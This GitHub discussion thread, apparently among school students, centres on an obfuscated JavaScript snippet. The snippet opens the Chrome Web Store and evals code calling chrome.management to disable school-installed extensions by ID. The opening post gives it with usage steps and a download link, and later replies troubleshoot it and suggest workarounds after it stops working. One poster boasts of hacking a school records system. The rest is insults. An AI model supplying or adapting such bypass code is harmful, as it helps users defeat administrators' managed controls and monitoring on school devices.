### DISCUSSION TITLE
Possible bypass for blocked bookmarklets

### DISCUSSION THREAD

**Discussion by phillipbruh** [3kh0/ext-remover#79] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
note to owner - can you make a file (inside this rep) called bypass.html and put this inside since most ppls bookmarklets are blocked
![image](https://user-images.githubusercontent.com/95700058/196730756-190ed987-20fb-4ad2-a025-2a7cc48a5578.png)

HOW TO USE
Download this and double click bypass.html which inside of your files
https://drive.google.com/file/d/1FGaGkP8sA87JdFMoxgjMm00Kpwh23ccV/view?usp=sharing
OR
if your on chromebook open the text app and paste the code inside then click ctrl+s and name it bypass.html then goto your files and double click it

```
<script>
var bypass = window.open('https://chrome.google.com/webstorex');
bypass.eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d(\'c b a: (9 8 7)\').6(\',\').5(0=>{4.3.2(0,!1)})',14,14,'i||setEnabled|management|chrome|forEach|split|commas|by|seperated|here|IDs|Extension|prompt|uninstall'.split('|'),0,{}))
</script>
```

You can get extensions ids by
1.Visit chrome://extensions and on the extension you want to disable click on Details
2.Copy the text in the URL after the ?id=
3.Put the ID you copied into the text box.

**Comment by ghost** [comment]
wym make a file

**Reply by ghost** [reply]
how do you make a file because i cant

**Reply by phillipbruh** [reply]
if your on chromebook open the text app and paste the code inside then click ctrl+s and name it bypass.html then goto your files and double click it

**Reply by ghost** [reply]
Phillip you got discord

**Reply by phillipbruh** [reply]
yes why?

**Reply by ghost** [reply]
bc i dont understand because i dont have the text app

**Reply by ghost** [reply]
![image](https://user-images.githubusercontent.com/77454237/196730675-3c68651e-69cb-4bd4-beb4-227919898e34.png)
Thats what it says when i go to add it to my laptop

**Reply by phillipbruh** [reply]
download from the google drive

**Reply by ghost** [reply]
wym google drive

**Reply by ghost** [reply]
nvm

**Reply by ghost** [reply]
thanks

**Reply by ghost** [reply]
[Screen recording 2022-10-19 11.27.36 AM.webm](https://user-images.githubusercontent.com/77454237/196735895-0097ff7b-6ab3-4a69-8b50-834d8147d427.webm)

**Comment by 3kh0** [comment, marked as answer]
You can do it yourself

**Reply by ghost** [reply]
What do i do with the file after tho

**Reply by ghost** [reply]
Do i put it into my bookmarks

**Reply by phillipbruh** [reply]
i was saying you can add it to the repository if you want to lmao since most ppls bookmarklets are blocked

**Reply by phillipbruh** [reply]
> Do i put it into my bookmarks

just double click the html file

**Reply by ghost** [reply]
Wym repository

**Reply by phillipbruh** [reply]
thats for the owner  i put a image of the text app for u

**Reply by ghost** [reply]
![image](https://user-images.githubusercontent.com/77454237/196731444-72f06a8d-3091-4406-a087-1f1012c33a7b.png)
see

**Reply by ghost** [reply]
i dont understand why i dont have it

**Reply by ghost** [reply]
Phillip whats your discord

**Reply by phillipbruh** [reply]
check the google drive i put in

**Reply by ghost** [reply]
how am i supposed to see your google drive

**Reply by ghost** [reply]
How do i find the extention id?

**Reply by ghost** [reply]
it didnt disable it

**Reply by phillipbruh** [reply]
i updated how to get ids

**Reply by ghost** [reply]
ok it still didnt disable it

**Reply by ghost** [reply]
It didnt disable it unpinned it

**Reply by phillipbruh** [reply]
hmmm i might have been patched then try installing tampermonkey and running the code from there you can install it on the chrome webstore if its blocked then make sure you have at least 2 account signed in and goto https://chrome.google.com/webstore?authuser=1

**Reply by MilkMaker23** [reply]
can you make one with chrome.google.ccom/webstorewwwww 

webstorex is blocked

**Reply by MilkMaker23** [reply]
https://drive.google.com/file/d/1rgdbgrgWxhtBW8U_8DJnpbeZ8W-GWjuZ/view

**Reply by MilkMaker23** [reply]
[Uploading Untitled_ Apr 21, 2023 1_12 PM (1).webm…]()

**Reply by MilkMaker23** [reply]
it does not work

**Reply by phillipbruh** [reply]
yes it stopped working awhile ago back in october

**Reply by MilkMaker23** [reply]
why is there a new one

**Reply by Perm-Kevin** [reply]
I don't think so
I think the schools blocked the bookmarklets with JavaScript:/*
I'm working on trying to bypass it.

**Reply by 88411** [reply]
Stop necroposting omg. You literally adding no value to this thread.

**Comment by Perm-Kevin** [comment]
thats a big word
for a 8 year old

**Reply by phillipbruh** [reply]
Bro im just tryna help you out before you go down this rabbit hole. It is so fucking easy to find exploits in chrome os there is like a million, and tn network and people like 3kh0 are just fucking gate keepers who wanna be so high and mighty. Like just dont get involved in that shit unless you wanna turn into one of "those people" yk the ones at your school who sit with hunch backs over there chromebooks 24/7 in the corner of lunch with no freinds, the sterotypical band kids, the kids who dont use deodorant. Like i almost fucking became one of them before i locked tf in now i got a gf, fucking fun life and still program. I did get expelled for hacking into infinite campus but like thats kinda fucking cool. This is just a word of advice.

**Comment by Perm-Kevin** [comment]
i am one of those kids ngl

**Reply by 88411** [reply]
bro I can ban ur account for being underage xD 
u need to be 13

**Comment by Perm-Kevin** [comment]
wdym i am 13

**Comment by Perm-Kevin** [comment]
lol ru like at school right now no-lifing
ur prob in like 6th grade and got held back lol

**Comment by phillipbruh** [comment]
bro goto reddit to have arguments or on discord u can talk to your kittens bro if your one of those kids idgf just stop postin here spamming my email
